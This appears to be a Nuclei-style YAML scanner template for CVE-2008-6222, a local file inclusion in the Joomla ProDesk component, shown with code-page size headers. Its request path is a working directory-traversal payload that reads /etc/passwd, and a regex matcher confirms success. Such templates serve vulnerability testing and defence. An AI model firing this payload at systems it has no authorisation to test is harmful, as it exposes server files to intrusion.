32 lines
1018 B
YAML
32 lines
1018 B
YAML
id: CVE-2008-6222
|
|
|
|
info:
|
|
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/6980
|
|
- https://www.cvedetails.com/cve/CVE-2008-6222
|
|
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
|
|
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
|
|
classification:
|
|
cve-id: CVE-2008-6222
|
|
tags: cve,cve2008,joomla,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|